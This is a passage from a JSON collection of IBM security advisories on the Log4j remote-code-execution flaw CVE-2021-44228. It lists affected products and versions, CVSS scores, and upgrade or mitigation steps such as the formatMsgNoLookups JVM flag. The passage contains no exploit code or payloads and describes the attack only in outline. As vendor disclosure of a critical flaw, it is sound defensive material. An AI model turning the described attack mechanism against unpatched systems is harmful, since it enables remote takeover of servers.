\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Data| 4.0 (all previous refreshes) \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Affected Product(s)**| **Version(s)**| **Remediation/Fix** \n---|---|--- \nCloud Pak for Data| 4.0 (all previous refreshes)| \n\n[4.0.4](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSHGYS\",\"label\":\"IBM Cloud Pak for Data\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"4.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T17:05:16", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability affects Cloud Pak for Data (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T17:05:16", "id": 
"5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "href": "https://www.ibm.com/support/pages/node/6529302", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:20", "description": "## Summary\n\nLog4j CVE-2021-44228 also called Log4Shell or LogJam affected the CP4BA Workflow Process Service. Customers are encouraged to take action and apply the fix below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCP4BA - Workflow Process Services| 21.0.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the Interim Fix (iFix) or Cumulative Fix (CF): \n\nFor IBM Cloud Pak for Business Automation V21.0.2. 
Apply IF006 or above.\n\nUpdate the image by following the steps in CP4BA [21.0.2 IF006 release note](<https://www.ibm.com/support/pages/node/6524920> \"21.0.2 IF006 release note\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7JTW\",\"label\":\"IBM Cloud Pak for Automation\"},\"Component\":\"Workflow Process Service\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"21.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T01:52:37", "type": "ibm", "title": "Security Bulletin: Log4j - CVE-2021-44228 vulnerability affects IBM Cloud Pak for Business Automation(CP4BA) Workflow Process Service", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-44228"], "modified": "2021-12-21T01:52:37", "id": "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "href": "https://www.ibm.com/support/pages/node/6528692", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-19T17:39:26", "description": "## Summary\n\nIs Blueworks Live affected by CVE-2021-44228 (Log4j Vulnerability)?\n\n## Vulnerability Details\n\nPlease refer to the Flash Alert published here:\n<https://www.ibm.com/support/pages/node/6527936>\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](\nhttp://www-01.ibm.com/software/support/einfo.html) to be notified of important\nproduct support alerts like this.\n\nOff\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](http://www.ibm.com/security/secure-\nengineering/bulletins.html) \n[IBM Product Security Incident Response Blog](http://www.ibm.com/blogs/psirt)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the\nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard\ndesigned to convey vulnerability severity and help to determine urgency and\npriority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY\nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT\nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of\nBusiness\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business\nUnit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o\nTPS\"},\"Product\":{\"code\":\"SS2MKC\",\"label\":\"IBM Blueworks Live\"},\"ARM\nCategory\":[{\"code\":\"a8m50000000L2DTAA0\",\"label\":\"DevOps-\\u003EServer\nIssues\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform\nIndependent\"}],\"Version\":\"All Versions\"}]\n\n## Product Synonym\n\nblueworkslive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:30:47", "type": "ibm", "title": "Security Bulletin: Is Blueworks Live affected by CVE-2021-44228 (Log4j Vulnerability)?", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:30:47", "id": "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "href": "https://www.ibm.com/support/pages/node/6526706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-10-01T01:36:45", "description": "## Summary\n\nStoredIQ is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228). Apache Log4j is used by StoredIQ 7.6.0 as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ| 7.6.0.0 - 7.6.0.22 \n \n\n\n## Remediation/Fixes\n\nUpgrade to fix pack 7.6.0.22 and apply interim fix siq_7_6_0_22_log4j_2_17_1_if that is available from Fix Central [https://www.ibm.com/support/fixcentral/. 
](<https://www.ibm.com/support/fixcentral/.>)Instructions are included in the ReadMe in the interim fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n16 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHEC\",\"label\":\"StoredIQ\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-17T21:36:21", "type": "ibm", "title": "Security Bulletin: StoredIQ Is Vulnerable To Arbitrary Code Execution Due to Apache Log4j (CVE-2021-44228).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-17T21:36:21", "id": "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "href": "https://www.ibm.com/support/pages/node/6596145", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:33", "description": "## Summary\n\nApache Log4j vulnerability impacts Rational Performance Tester (RPT) Apache JMeter\u2122 Test Extension. Rational Performance Tester (RPT) includes a vulnerable Log4j library that may be detected by a vulnerability scan. This bulletin addresses the vulnerabilities for the reported CVE-2021-44228. The below fix package removes the Log4j version 2 library.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. 
By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nRational Performance Tester | 10.2 \nRational Performance Tester| 10.1 \nRational Performance Tester| 10.0 \nRational Performance Tester| 9.5 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Customers that are using the Apache JMeter Test Extension should upgrade to Rational Performance Tester version 10.2 and use Installation Manager to update to version 10.2.1.1 iFix 01. **\n\n[https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Performance+Tester&release=10.2.1&platform=All&function=fixId&fixids=10.2.1.1-Rational-RPT-groupfixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Performance+Tester&release=10.2.1&platform=All&function=fixId&fixids=10.2.1.1-Rational-RPT-groupfixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n**Customers not using the Apache JMeter Test Extension may remediate their systems by uninstalling the Apache JMeter Test Extension OR installing Rational Performance Tester version 10.2.1.1 iFix 01. **\n\nRational Performance Tester version 10.2.1.1 iFix 01 removes the vulnerable Apache Log4j version 2 library from Rational Performance Tester. \nTo uninstall the Apache JMeter Test Extension: \n1\\. 
Stop or exit from the Eclipse instance of Rational Performance Tester. \n2\\. Start Installation Manager. \n3\\. Select Modify. \n4\\. Clear the Apache JMeter Test Extension checkbox.\n\nRational Performance Tester version 10.2.1.1 iFix 01 can be updated via Installation Manager or downloaded from Fix Central. \nTo install Rational Performance Tester version 10.2.1.1 iFix 01: \n1\\. Upgrade from version 9.5, 10.0 or 10.1 to Rational Performance Tester version 10.2. \n2\\. In Installation Manager choose Update and select version 10.2.1.1 iFix 01.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n27 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMMM5\",\"label\":\"Rational Performance Tester\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.5, 10.0, 10.1, 10.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T14:08:40", "type": "ibm", "title": "Security Bulletin: Rational Performance Tester (RPT) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T14:08:40", "id": "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "href": "https://www.ibm.com/support/pages/node/6538090", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:29", "description": "## Summary\n\nIBM Cloud Pak for Multicloud Management has applied security fixes for its use of Log4j for CVE-2021-44228. Log4j is used by various microservices either directly or indirectly through dependent open source software for logging messages to files. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Security Services| Before 2.3 Fixpack 3 \nIBM Cloud Pak for Multicloud Management Monitoring| Before 2.3 Fixpack 3 \n \n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 3 by following the instructions at <https://ibm.biz/upgrade_fixpack>. \n\n**Note: **\n\n\\- The Apache Log4j open source library is used by Elasticsearch for logging messages to files. 
The recommended solution involves two images of IBM Cloud Pak for Multicloud Management: **icp-elasticsearch-oss**. This image has been updated to use Elasticsearch 6.8.21 in IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 3. For details about the Elasticsearch announcement (ESA-2021-31), see <https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n\\- Where the log4j package could not be updated at this time, this 2.3 Fix Pack 3 release mitigates the vulnerability by setting the JVM option -Dlog4j2.formatMsgNoLookups=true and removing the vulnerable JndiLookup class from the Log4j package. Some vulnerability scanners might continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigations sufficiently protect against both remote code execution and information leakage.\n\n## Workarounds and Mitigations\n\nIBM recommends clients should configure their firewalls to block unauthorized outbound connections to mitigate against this and similar vulnerabilities.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFC4F\",\"label\":\"IBM Cloud Pak for Multicloud Management\"},\"Component\":\"Monitoring\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:09:46", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Multicloud Management has applied security fixes for its use of Log4j for CVE-2021-44228", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2022-01-05T19:09:46", "id": "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "href": "https://www.ibm.com/support/pages/node/6528670", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:49", "description": "## Summary\n\nIBM Edge Application Manager (IEAM) 4.3.0 has a dependency on IBM Cloud Pak Foundational Services (IBM Common Services) which includes an unused Operator that contains a vulnerable version of Apache Log4j as described in CVE-2021-44228. An upgrade has been released which includes Apache Log4j version 2.15.0 to address this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Edge Application Manager| 4.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing this vulnerability now by upgrading.**\n \n \n By default, subscriptions to the IBM Edge Application Manager (IEAM) operator and its dependent operands are set \n to automatic approval for its update channel. 
This means that new releases of IEAM or its dependencies for the \n configured channel will be automatically applied.\n \n Note: A Cluster Administrator can set the approval strategy to Manual. In this case \n a Cluster Administrator will need to manually approve pending changes.\n \n Otherwise, the latest version of IBM Cloud Pak Foundational Services (3.6.7) \n has been released and all IBM Edge Application Manager 4.3.0 instances will be\n upgraded automatically without user-intervention if automatic updates are \n enabled.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
